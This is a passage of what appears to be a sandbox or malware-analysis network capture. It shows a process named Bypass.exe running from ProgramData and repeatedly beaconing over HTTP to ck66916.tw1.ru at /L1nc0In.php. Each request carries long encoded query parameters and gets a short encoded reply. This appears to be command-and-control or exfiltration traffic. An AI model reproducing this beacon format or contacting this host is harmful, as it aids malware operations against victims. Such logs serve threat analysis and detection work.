                        Content-Length: 104
                        Connection: keep-alive
                        Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 53 4e 7a 51 44 4e 34 55 57 4e 31 55 57 5a 6c 56 47 5a 78 49 54 59 79 45 32 4e 7a 51 57 4e 32 4d 44 4f 6a 5a 54 4d 79 59 54 4f 7a 49 79 65 36 49 79 59 6d 4a 47 4f 35 59 32 4e 79 55 32 4e 69 42 6a 4e 6b 4a 47 5a 7a 49 7a 4e 6b 68 7a 4d 6d 64 54 4e 6b 56 32 4d 33 4d 6a 4d 30 49 79 65
                        Data Ascii: ==Qf9JiI6ISNzQDN4UWN1UWZlVGZxITYyE2NzQWN2MDOjZTMyYTOzIye6IyYmJGO5Y2NyU2NiBjNkJGZzIzNkhzMmdTNkV2M3MjM0Iye
                        Jun 23, 2024 06:55:53.102534056 CEST267INHTTP/1.1 200 OK
                        Server: nginx/1.24.0
                        Date: Sun, 23 Jun 2024 04:55:52 GMT
                        Content-Type: text/html; charset=UTF-8
                        Content-Length: 104
                        Connection: keep-alive
                        Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 53 4e 7a 51 44 4e 34 55 57 4e 31 55 57 5a 6c 56 47 5a 78 49 54 59 79 45 32 4e 7a 51 57 4e 32 4d 44 4f 6a 5a 54 4d 79 59 54 4f 7a 49 79 65 36 49 79 59 6d 4a 47 4f 35 59 32 4e 79 55 32 4e 69 42 6a 4e 6b 4a 47 5a 7a 49 7a 4e 6b 68 7a 4d 6d 64 54 4e 6b 56 32 4d 33 4d 6a 4d 30 49 79 65
                        Data Ascii: ==Qf9JiI6ISNzQDN4UWN1UWZlVGZxITYyE2NzQWN2MDOjZTMyYTOzIye6IyYmJGO5Y2NyU2NiBjNkJGZzIzNkhzMmdTNkV2M3MjM0Iye


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        20192.168.2.44976892.53.96.121807004C:\ProgramData\SoftwareDistribution\Bypass.exe
                        TimestampBytes transferredDirectionData
                        Jun 23, 2024 06:55:57.906275988 CEST2247OUTGET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=QX9JiI6IiMkBzNiZzYihjYzgzYyUGO5YjZmVGOlNTOxkjY2gDZwICLiUGZ3Q2YzYTN5gDO2czMjZzMlRjY3gjZklDOwETNxImMxQzNlNGZxcjI6IyY2UjYwczYjFDZwgDNmdTN2YDMiVWM3QDN1IjNzADO1ICLiYzNkNGZ0IWM5QmY5QjY5cDNhZTZ2cDZihTOzI2YmVGNwEWZmFDMmZjI6ISO2QDOxQTMwMjYwITZ2kDN1MGMjFWZ4QzYlVGMjBzY4Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZ [TRUNCATED]
                        Accept: */*
                        Content-Type: text/css
                        User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                        Host: ck66916.tw1.ru
                        Connection: Keep-Alive
                        Jun 23, 2024 06:55:58.653141022 CEST267INHTTP/1.1 200 OK
                        Server: nginx/1.24.0
                        Date: Sun, 23 Jun 2024 04:55:58 GMT
                        Content-Type: text/html; charset=UTF-8
                        Content-Length: 104
                        Connection: keep-alive
                        Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 53 4e 7a 51 44 4e 34 55 57 4e 31 55 57 5a 6c 56 47 5a 78 49 54 59 79 45 32 4e 7a 51 57 4e 32 4d 44 4f 6a 5a 54 4d 79 59 54 4f 7a 49 79 65 36 49 79 59 6d 4a 47 4f 35 59 32 4e 79 55 32 4e 69 42 6a 4e 6b 4a 47 5a 7a 49 7a 4e 6b 68 7a 4d 6d 64 54 4e 6b 56 32 4d 33 4d 6a 4d 30 49 79 65
                        Data Ascii: ==Qf9JiI6ISNzQDN4UWN1UWZlVGZxITYyE2NzQWN2MDOjZTMyYTOzIye6IyYmJGO5Y2NyU2NiBjNkJGZzIzNkhzMmdTNkV2M3MjM0Iye


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        21192.168.2.44976992.53.96.121807004C:\ProgramData\SoftwareDistribution\Bypass.exe
                        TimestampBytes transferredDirectionData
                        Jun 23, 2024 06:56:03.808964968 CEST2247OUTGET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=QX9JiI6IiMkBzNiZzYihjYzgzYyUGO5YjZmVGOlNTOxkjY2gDZwICLiUGZ3Q2YzYTN5gDO2czMjZzMlRjY3gjZklDOwETNxImMxQzNlNGZxcjI6IyY2UjYwczYjFDZwgDNmdTN2YDMiVWM3QDN1IjNzADO1ICLiYzNkNGZ0IWM5QmY5QjY5cDNhZTZ2cDZihTOzI2YmVGNwEWZmFDMmZjI6ISO2QDOxQTMwMjYwITZ2kDN1MGMjFWZ4QzYlVGMjBzY4Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZ [TRUNCATED]
                        Accept: */*
                        Content-Type: text/css
                        User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                        Host: ck66916.tw1.ru
                        Connection: Keep-Alive
                        Jun 23, 2024 06:56:04.500912905 CEST267INHTTP/1.1 200 OK
                        Server: nginx/1.24.0
                        Date: Sun, 23 Jun 2024 04:56:04 GMT
                        Content-Type: text/html; charset=UTF-8
                        Content-Length: 104
                        Connection: keep-alive
                        Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 53 4e 7a 51 44 4e 34 55 57 4e 31 55 57 5a 6c 56 47 5a 78 49 54 59 79 45 32 4e 7a 51 57 4e 32 4d 44 4f 6a 5a 54 4d 79 59 54 4f 7a 49 79 65 36 49 79 59 6d 4a 47 4f 35 59 32 4e 79 55 32 4e 69 42 6a 4e 6b 4a 47 5a 7a 49 7a 4e 6b 68 7a 4d 6d 64 54 4e 6b 56 32 4d 33 4d 6a 4d 30 49 79 65
                        Data Ascii: ==Qf9JiI6ISNzQDN4UWN1UWZlVGZxITYyE2NzQWN2MDOjZTMyYTOzIye6IyYmJGO5Y2NyU2NiBjNkJGZzIzNkhzMmdTNkV2M3MjM0Iye


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        22192.168.2.44977092.53.96.121807004C:\ProgramData\SoftwareDistribution\Bypass.exe
                        TimestampBytes transferredDirectionData
                        Jun 23, 2024 06:56:09.516839981 CEST2247OUTGET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=QX9JiI6IiMkBzNiZzYihjYzgzYyUGO5YjZmVGOlNTOxkjY2gDZwICLiUGZ3Q2YzYTN5gDO2czMjZzMlRjY3gjZklDOwETNxImMxQzNlNGZxcjI6IyY2UjYwczYjFDZwgDNmdTN2YDMiVWM3QDN1IjNzADO1ICLiYzNkNGZ0IWM5QmY5QjY5cDNhZTZ2cDZihTOzI2YmVGNwEWZmFDMmZjI6ISO2QDOxQTMwMjYwITZ2kDN1MGMjFWZ4QzYlVGMjBzY4Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZ [TRUNCATED]
                        Accept: */*
                        Content-Type: text/css
                        User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                        Host: ck66916.tw1.ru
                        Connection: Keep-Alive
                        Jun 23, 2024 06:56:10.222587109 CEST267INHTTP/1.1 200 OK
                        Server: nginx/1.24.0
                        Date: Sun, 23 Jun 2024 04:56:10 GMT
                        Content-Type: text/html; charset=UTF-8
                        Content-Length: 104
                        Connection: keep-alive
                        Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 53 4e 7a 51 44 4e 34 55 57 4e 31 55 57 5a 6c 56 47 5a 78 49 54 59 79 45 32 4e 7a 51 57 4e 32 4d 44 4f 6a 5a 54 4d 79 59 54 4f 7a 49 79 65 36 49 79 59 6d 4a 47 4f 35 59 32 4e 79 55 32 4e 69 42 6a 4e 6b 4a 47 5a 7a 49 7a 4e 6b 68 7a 4d 6d 64 54 4e 6b 56 32 4d 33 4d 6a 4d 30 49 79 65
                        Data Ascii: ==Qf9JiI6ISNzQDN4UWN1UWZlVGZxITYyE2NzQWN2MDOjZTMyYTOzIye6IyYmJGO5Y2NyU2NiBjNkJGZzIzNkhzMmdTNkV2M3MjM0Iye


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        23192.168.2.44977192.53.96.121807004C:\ProgramData\SoftwareDistribution\Bypass.exe
                        TimestampBytes transferredDirectionData
                        Jun 23, 2024 06:56:15.232300043 CEST2223OUTGET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=QX9JiI6IiMkBzNiZzYihjYzgzYyUGO5YjZmVGOlNTOxkjY2gDZwICLiUGZ3Q2YzYTN5gDO2czMjZzMlRjY3gjZklDOwETNxImMxQzNlNGZxcjI6IyY2UjYwczYjFDZwgDNmdTN2YDMiVWM3QDN1IjNzADO1ICLiYzNkNGZ0IWM5QmY5QjY5cDNhZTZ2cDZihTOzI2YmVGNwEWZmFDMmZjI6ISO2QDOxQTMwMjYwITZ2kDN1MGMjFWZ4QzYlVGMjBzY4Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZ [TRUNCATED]
                        Accept: */*
                        Content-Type: text/css
                        User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                        Host: ck66916.tw1.ru
                        Jun 23, 2024 06:56:16.951023102 CEST267INHTTP/1.1 200 OK
                        Server: nginx/1.24.0
                        Date: Sun, 23 Jun 2024 04:56:15 GMT
                        Content-Type: text/html; charset=UTF-8
                        Content-Length: 104
                        Connection: keep-alive
                        Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 53 4e 7a 51 44 4e 34 55 57 4e 31 55 57 5a 6c 56 47 5a 78 49 54 59 79 45 32 4e 7a 51 57 4e 32 4d 44 4f 6a 5a 54 4d 79 59 54 4f 7a 49 79 65 36 49 79 59 6d 4a 47 4f 35 59 32 4e 79 55 32 4e 69 42 6a 4e 6b 4a 47 5a 7a 49 7a 4e 6b 68 7a 4d 6d 64 54 4e 6b 56 32 4d 33 4d 6a 4d 30 49 79 65
                        Data Ascii: ==Qf9JiI6ISNzQDN4UWN1UWZlVGZxITYyE2NzQWN2MDOjZTMyYTOzIye6IyYmJGO5Y2NyU2NiBjNkJGZzIzNkhzMmdTNkV2M3MjM0Iye
                        Jun 23, 2024 06:56:16.951039076 CEST267INHTTP/1.1 200 OK
                        Server: nginx/1.24.0
                        Date: Sun, 23 Jun 2024 04:56:15 GMT
                        Content-Type: text/html; charset=UTF-8
                        Content-Length: 104
                        Connection: keep-alive
                        Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 53 4e 7a 51 44 4e 34 55 57 4e 31 55 57 5a 6c 56 47 5a 78 49 54 59 79 45 32 4e 7a 51 57 4e 32 4d 44 4f 6a 5a 54 4d 79 59 54 4f 7a 49 79 65 36 49 79 59 6d 4a 47 4f 35 59 32 4e 79 55 32 4e 69 42 6a 4e 6b 4a 47 5a 7a 49 7a 4e 6b 68 7a 4d 6d 64 54 4e 6b 56 32 4d 33 4d 6a 4d 30 49 79 65
                        Data Ascii: ==Qf9JiI6ISNzQDN4UWN1UWZlVGZxITYyE2NzQWN2MDOjZTMyYTOzIye6IyYmJGO5Y2NyU2NiBjNkJGZzIzNkhzMmdTNkV2M3MjM0Iye
                        Jun 23, 2024 06:56:16.951045990 CEST267INHTTP/1.1 200 OK
                        Server: nginx/1.24.0
                        Date: Sun, 23 Jun 2024 04:56:15 GMT
                        Content-Type: text/html; charset=UTF-8
                        Content-Length: 104
                        Connection: keep-alive
                        Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 53 4e 7a 51 44 4e 34 55 57 4e 31 55 57 5a 6c 56 47 5a 78 49 54 59 79 45 32 4e 7a 51 57 4e 32 4d 44 4f 6a 5a 54 4d 79 59 54 4f 7a 49 79 65 36 49 79 59 6d 4a 47 4f 35 59 32 4e 79 55 32 4e 69 42 6a 4e 6b 4a 47 5a 7a 49 7a 4e 6b 68 7a 4d 6d 64 54 4e 6b 56 32 4d 33 4d 6a 4d 30 49 79 65
                        Data Ascii: ==Qf9JiI6ISNzQDN4UWN1UWZlVGZxITYyE2NzQWN2MDOjZTMyYTOzIye6IyYmJGO5Y2NyU2NiBjNkJGZzIzNkhzMmdTNkV2M3MjM0Iye
                        Jun 23, 2024 06:56:16.951052904 CEST267INHTTP/1.1 200 OK
                        Server: nginx/1.24.0
                        Date: Sun, 23 Jun 2024 04:56:15 GMT
                        Content-Type: text/html; charset=UTF-8
                        Content-Length: 104
                        Connection: keep-alive
                        Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 53 4e 7a 51 44 4e 34 55 57 4e 31 55 57 5a 6c 56 47 5a 78 49 54 59 79 45 32 4e 7a 51 57 4e 32 4d 44 4f 6a 5a 54 4d 79 59 54 4f 7a 49 79 65 36 49 79 59 6d 4a 47 4f 35 59 32 4e 79 55 32 4e 69 42 6a 4e 6b 4a 47 5a 7a 49 7a 4e 6b 68 7a 4d 6d 64 54 4e 6b 56 32 4d 33 4d 6a 4d 30 49 79 65
                        Data Ascii: ==Qf9JiI6ISNzQDN4UWN1UWZlVGZxITYyE2NzQWN2MDOjZTMyYTOzIye6IyYmJGO5Y2NyU2NiBjNkJGZzIzNkhzMmdTNkV2M3MjM0Iye


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        24192.168.2.44977292.53.96.121807004C:\ProgramData\SoftwareDistribution\Bypass.exe
                        TimestampBytes transferredDirectionData
                        Jun 23, 2024 06:56:21.968521118 CEST2220OUTGET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=0VfiIiOiIDZwcjY2MmY4I2M4MmMlhTO2YmZlhTZzkTM5ImN4QGMiwiIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZUJUeNBTREl0cWdkW2FTRJJTQTV2 [TRUNCATED]
                        Accept: */*
                        Content-Type: text/css
                        User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                        Host: ck66916.tw1.ru
                        Connection: Keep-Alive
                        Jun 23, 2024 06:56:22.679023981 CEST267INHTTP/1.1 200 OK
                        Server: nginx/1.24.0
                        Date: Sun, 23 Jun 2024 04:56:22 GMT
                        Content-Type: text/html; charset=UTF-8
                        Content-Length: 104
                        Connection: keep-alive
                        Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 53 4e 7a 51 44 4e 34 55 57 4e 31 55 57 5a 6c 56 47 5a 78 49 54 59 79 45 32 4e 7a 51 57 4e 32 4d 44 4f 6a 5a 54 4d 79 59 54 4f 7a 49 79 65 36 49 79 59 6d 4a 47 4f 35 59 32 4e 79 55 32 4e 69 42 6a 4e 6b 4a 47 5a 7a 49 7a 4e 6b 68 7a 4d 6d 64 54 4e 6b 56 32 4d 33 4d 6a 4d 30 49 79 65
                        Data Ascii: ==Qf9JiI6ISNzQDN4UWN1UWZlVGZxITYyE2NzQWN2MDOjZTMyYTOzIye6IyYmJGO5Y2NyU2NiBjNkJGZzIzNkhzMmdTNkV2M3MjM0Iye
                        Jun 23, 2024 06:56:22.924010992 CEST267INHTTP/1.1 200 OK
                        Server: nginx/1.24.0
                        Date: Sun, 23 Jun 2024 04:56:22 GMT
                        Content-Type: text/html; charset=UTF-8
                        Content-Length: 104
                        Connection: keep-alive
                        Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 53 4e 7a 51 44 4e 34 55 57 4e 31 55 57 5a 6c 56 47 5a 78 49 54 59 79 45 32 4e 7a 51 57 4e 32 4d 44 4f 6a 5a 54 4d 79 59 54 4f 7a 49 79 65 36 49 79 59 6d 4a 47 4f 35 59 32 4e 79 55 32 4e 69 42 6a 4e 6b 4a 47 5a 7a 49 7a 4e 6b 68 7a 4d 6d 64 54 4e 6b 56 32 4d 33 4d 6a 4d 30 49 79 65
                        Data Ascii: ==Qf9JiI6ISNzQDN4UWN1UWZlVGZxITYyE2NzQWN2MDOjZTMyYTOzIye6IyYmJGO5Y2NyU2NiBjNkJGZzIzNkhzMmdTNkV2M3MjM0Iye


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        25192.168.2.44977392.53.96.121807004C:\ProgramData\SoftwareDistribution\Bypass.exe
                        TimestampBytes transferredDirectionData
                        Jun 23, 2024 06:56:27.699659109 CEST2223OUTGET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=QX9JiI6IiMkBzNiZzYihjYzgzYyUGO5YjZmVGOlNTOxkjY2gDZwICLiUGZ3Q2YzYTN5gDO2czMjZzMlRjY3gjZklDOwETNxImMxQzNlNGZxcjI6IyY2UjYwczYjFDZwgDNmdTN2YDMiVWM3QDN1IjNzADO1ICLiYzNkNGZ0IWM5QmY5QjY5cDNhZTZ2cDZihTOzI2YmVGNwEWZmFDMmZjI6ISO2QDOxQTMwMjYwITZ2kDN1MGMjFWZ4QzYlVGMjBzY4Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZ [TRUNCATED]
                        Accept: */*
                        Content-Type: text/css
                        User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                        Host: ck66916.tw1.ru
                        Jun 23, 2024 06:56:28.389945030 CEST267INHTTP/1.1 200 OK
                        Server: nginx/1.24.0
                        Date: Sun, 23 Jun 2024 04:56:28 GMT
                        Content-Type: text/html; charset=UTF-8
                        Content-Length: 104
                        Connection: keep-alive
                        Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 53 4e 7a 51 44 4e 34 55 57 4e 31 55 57 5a 6c 56 47 5a 78 49 54 59 79 45 32 4e 7a 51 57 4e 32 4d 44 4f 6a 5a 54 4d 79 59 54 4f 7a 49 79 65 36 49 79 59 6d 4a 47 4f 35 59 32 4e 79 55 32 4e 69 42 6a 4e 6b 4a 47 5a 7a 49 7a 4e 6b 68 7a 4d 6d 64 54 4e 6b 56 32 4d 33 4d 6a 4d 30 49 79 65
                        Data Ascii: ==Qf9JiI6ISNzQDN4UWN1UWZlVGZxITYyE2NzQWN2MDOjZTMyYTOzIye6IyYmJGO5Y2NyU2NiBjNkJGZzIzNkhzMmdTNkV2M3MjM0Iye


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        26192.168.2.44977492.53.96.121807004C:\ProgramData\SoftwareDistribution\Bypass.exe
                        TimestampBytes transferredDirectionData
                        Jun 23, 2024 06:56:33.404398918 CEST2223OUTGET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=QX9JiI6IiMkBzNiZzYihjYzgzYyUGO5YjZmVGOlNTOxkjY2gDZwICLiUGZ3Q2YzYTN5gDO2czMjZzMlRjY3gjZklDOwETNxImMxQzNlNGZxcjI6IyY2UjYwczYjFDZwgDNmdTN2YDMiVWM3QDN1IjNzADO1ICLiYzNkNGZ0IWM5QmY5QjY5cDNhZTZ2cDZihTOzI2YmVGNwEWZmFDMmZjI6ISO2QDOxQTMwMjYwITZ2kDN1MGMjFWZ4QzYlVGMjBzY4Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZ [TRUNCATED]
                        Accept: */*
                        Content-Type: text/css
                        User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                        Host: ck66916.tw1.ru
                        Jun 23, 2024 06:56:34.093904018 CEST267INHTTP/1.1 200 OK
                        Server: nginx/1.24.0
                        Date: Sun, 23 Jun 2024 04:56:33 GMT
                        Content-Type: text/html; charset=UTF-8
                        Content-Length: 104
                        Connection: keep-alive
                        Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 53 4e 7a 51 44 4e 34 55 57 4e 31 55 57 5a 6c 56 47 5a 78 49 54 59 79 45 32 4e 7a 51 57 4e 32 4d 44 4f 6a 5a 54 4d 79 59 54 4f 7a 49 79 65 36 49 79 59 6d 4a 47 4f 35 59 32 4e 79 55 32 4e 69 42 6a 4e 6b 4a 47 5a 7a 49 7a 4e 6b 68 7a 4d 6d 64 54 4e 6b 56 32 4d 33 4d 6a 4d 30 49 79 65
                        Data Ascii: ==Qf9JiI6ISNzQDN4UWN1UWZlVGZxITYyE2NzQWN2MDOjZTMyYTOzIye6IyYmJGO5Y2NyU2NiBjNkJGZzIzNkhzMmdTNkV2M3MjM0Iye


